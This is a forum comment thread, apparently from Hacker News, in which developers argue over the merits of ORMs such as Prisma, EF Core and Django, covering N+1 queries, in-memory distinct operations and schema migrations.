Or, you could simply use a CRUD model 1:1 with your database schema and optimize top-level resolvers yourself where actually needed.

Prisma can also work, but is more susceptible to N+1 if the db adapter layer does separate queries instead of joining.


Prisma has shown me that anything is possible with an ORM. I think they may have changed this now, but at least within the last year, distincts were done IN MEMORY.

They had a reason, an I'm sure it had some merit, but we found this out while tracking down an OOM. On the bright side, my co worker and I got a good joke to bring up on occasion out of it.


That sounds plausible in theory, but I've been developing big ol' LOB apps for more than 10 years now and it happens very very sporadically. I mean bloated joins is maybe the most common, but never near enough bloated to be an actual problem.

And schema changes and migrations? With ORMs those are a breeze, what are you're on about. It's like 80% of the reason why we want to use ORMs. A data type change or a typo would be immediately caught during compilation making refactoring super easy. It's like a free test of all queries in the entire system. I assume that we're talking about decent ORMs where schema is also managed in code and a statically typed language, otherwise what's the point.

We're on .NET 8+ and using EF Core.


ORM hate might as well be a free square on "HN web development blog post Bingo".


Funny, I use prisma and pothos, with p99 at below 50ms - no N+1

(when it is not lower, then it is because there are sec framework and other fields that might not be mapped directly do the prisma schema)


Doesn't prisma do many sql features like distinct... In memory?


Yes, but you can use the `nativeDistinct` preview feature rely on the DB to perform the operation.

You can see the related issue with more info:

https://github.com/prisma/prisma/issues/23846


Just in case:

Object-relational mapping (ORM) is a key concept in the field of Database Management Systems (DBMS), addressing the bridge between the object-oriented programming approach and relational databases. ORM is critical in data interaction simplification, code optimization, and smooth blending of applications and databases. The purpose of this article is to explain ORM, covering its basic principles, benefits, and importance in modern software development.


Why can't one use ORM and then flag queries which are slow? This is trivial.

Inspect the actual SQL query generated, and if needed modify ORM code or write a SQL query from scratch.


we have AI that scans for any potential query N+1 right now

people forget how sql works??? people literally try to forget on how to program

more and more programmer use markdown to "write" code


At the end of day its a trade off. It would be an exception if anyone can remember their own code/customization after 3 months. ORMs or frameworks are more or less conventions which are easier to remember cause you iterate on them multiple times. They are bloated for a good reason, to be able to server much larger population than specific use cases and yes that does brings its own problems.


Weeks of handwriting SQL queries can save you hours of profiling and adding query hints.

If you want a maintainable system enforce that everything goes through the ORM. Migrations autogenerated from the ORM classes - have a check that the ORM representation and the deployed schema are in sync as part of your build. Block direct SQL access methods in your linter. Do that and maintainability is a breeze.


The only time I've seen migrations randomly fail was when others were manually-creating views that prevented modifications to tables. Using the migrations yourself for local dev environments is a good mitigation, except for that.


Skill issue.

In the hand of a good team, ORMs and migrations are an unbeatable productivity boost.

Django is best in class.


Pro tip. Don't use Django migrations. Manage the database first and mirror it in orm later.


Why? Isn't this easier to screw up the prod db?


Business opportunity: Invent a type system that prevents N+1 queries.


But think of how much time you’ll save needing to map entities to tables!!!! Better to reinvest that time trying to make the ORM do a worse job, automatically instead!!


Or just use MongoDB. No ORM needed.


Very practical, like a credit card.

Let's you do what you want here and now and then pay dearly for it afterwards :-)


Eh, nobody wants to transfer rows to DTOs by hand.

My personal opinion is that ORMs are absolutely fine for read provided you periodically check query performance, which you need to do anyway. For write it's a lot murkier.

It helps that EF+LINQ works so very well for me. You can even write something very close to SQL directly in C#, but I prefer the function syntax.


Yeah EF is amazing


Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: